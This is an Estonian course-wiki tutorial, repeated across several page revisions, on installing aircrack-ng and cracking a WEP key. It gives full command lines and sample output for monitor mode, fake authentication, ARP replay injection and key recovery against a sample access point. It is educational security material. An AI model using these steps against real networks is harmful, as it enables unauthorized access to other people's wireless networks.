Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>
''
Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>

'''Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>

'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor(id)=

Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
</table>

Aircrack

2015-05-25T19:11:55Z

Ktragel:

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

'''Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi''' 
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!
'''
Samm 2: Testime „süstimise“ suutlikkust pääsupunktile''' 
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.

'''Samm 3: Avada airodump-ng pakettide püüdmiseks''' 
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>
'''
Samm 4: Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga''' 
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>
''
Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>
'''
Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis''' 
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>

'''Samm 6: Ava aircrack-ng salasõna lahti murdmiseks''' 
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor(id)=

Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
</table>

Aircrack

2015-05-25T19:08:45Z

Ktragel:

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
* airodump-ng - programm pakettide püüdmiseks
* aireplay-ng - programm pakettide „süstimiseks“
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks

==Süntaks==

aircrack-ng süntaks näeb välja järgmine:
<pre>aircrack-ng [võti] <püütud fail(id)></pre>

Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]

=Installeerimine=

Uuendame repositooriumi:
<pre>sudo apt-get update</pre>

Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:
<pre>sudo apt-get install aircrack-ng</pre>

=WEP võtme murdmine=

Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja:
* Arvuti MAC aadress, mis jooksutab aircrack-ng'd: 00:0F:B5:88:AC:82
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80
* ESSID (võrgu nimi): teddy
* Pääsupunkti kanal: 9
* Raadiovõrgu liides (ingl. k Wireless interface): ath0

==Eesmärk==
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.
 
 
==Lühikesed tegevussammud==
Lühidalt sammudest, mida tegema asume:
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode) 
2. Testime „süstimise“ suutlikkust pääsupunktile 
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid 
4. Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga 
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette 
6. Kasutada aircrack-ng'd salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid 

==Näide WEP võtme lahti murdmise protsessist==

====Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi====
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.

Peata ath0 liidese:
<pre>airmon-ng stop ath0</pre>

Tulemus:
<pre>Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)</pre>

Kontrolli, kas kõik athX liidesed on ikka suletud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.</pre>

Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval '''airmon-ng stop athX''' käsuga sulgeda.

Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:
<pre>airmon-ng start wifi0 9</pre>

Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.

Tulemus:
<pre> Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)</pre>

Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.

Veendumaks, et liides on korrektselt üles seatud:
<pre>iwconfig</pre>

Tulemus:
<pre>lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0</pre>

Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng'd jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!

====Testime „süstimise“ suutlikkust pääsupunktile====
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.

Sisesta käsureale:
<pre>aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80 ath0</pre>

''Selgituseks:
-9 - “süstimise” test
-e teddy – raadiovõrgu nimi
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress
ath0 – raadiovõrgu liides''

Tulemus:
<pre>09:23:35 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
09:23:35 Trying broadcast probe requests...
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests...
09:23:37 00:14:6C:7E:40:80 - channel: 9 - 'teddy'
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%</pre>

Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.

====Avada airodump-ng pakettide püüdmiseks====
Ava uus konsooliaken ja sisesta:
<pre>airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0</pre>

''Selgituseks:
-c 9 – raadiovõrgu kanal
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid''

Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:
<pre>CH 9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 42 100 5240 178307 338 9 54 WEP WEP teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:88:AC:82 42 0 183782 </pre>

====Kasutame aireplay-ng'd vale autentimise läbiviimiseks pääsupunktiga====
Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>
''
Selgitus:
-1 – võlts autentimine
0 – kordusühendus(t)e aeg sekundites
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress''

Õnnestumise korral on tulemus:
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)
Ebaõnnestumise korral on tulemus:
8:28:02 Sending Authentication Request
18:28:02 Authentication successful
18:28:02 Sending Association Request
18:28:02 Association successful :-)
18:28:02 Got a deauthentication packet!
18:28:05 Sending Authentication Request
18:28:05 Authentication successful
18:28:05 Sending Association Request
18:28:10 Sending Authentication Request
18:28:10 Authentication successful
18:28:10 Sending Association Request</pre>

====Ava aireplay-ng ARP päringute kordusrežiimis====
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“.

Ava uus konsooliaken ja sisesta:
<pre>aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0</pre>

Tulemus:
<pre>Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...</pre>

====Ava aircrack-ng salasõna lahti murdmiseks====
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal.

Ava uus konsooliaken:
<pre>aircrack-ng -b 00:14:6C:7E:40:80 output*.cap</pre>
''
Selgitus:
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”''

Tulemus:
<pre> [00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%</pre>

=Kokkuvõte=

=Kasutatud kirjandus=
<references/>

=Autor(id)=

Kelly Tragel [ISa 21]
Viimati muudetud: 25.05.2015

=Versioonide ajalugu=

<table border="1">
<tr>
<th> Kuupäev </th>
<th> Versioon </th>
</tr>
<tr>
<td> 25.05.2015 </td>
<td> 1.0 </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
<td> </td>
<td> </td>
</tr>
<tr>
</table>

Aircrack

2015-05-25T19:07:30Z

Ktragel:

=Sissejuhatus=
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit.

=Eeldused=

* Elementaarne käsurea kasutamisoskus
* Teadmised WiFi, WEP, WPA/WPA2 kohta
* Võrgus vähemalt 1 aktiivne klient
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])

WiFi adapteri vaatamine:
<pre>lspci -nn | grep Network</pre>

või rohkema informatsiooni saamiseks:

<pre>lshw -class network</pre>

Tulemuseks saame midagi sarnast:
<pre>02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)</pre>

või

<pre>*-network
description: Wireless interface
product: Centrino Advanced-N 6205 [Taylor Peak]
vendor: Intel Corporation
physical id: 0
bus info: pci@0000:02:00.0
logical name: wlan0
version: 34
serial: 6c:88:14:1d:29:c4
width: 64 bits
clock: 33MHz
capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn
resources: irq:32 memory:f7d00000-f7d01fff</pre>

<div style="padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;">'''Pane tähele! '''Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. </div>

=Üldkirjeldus=

aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:
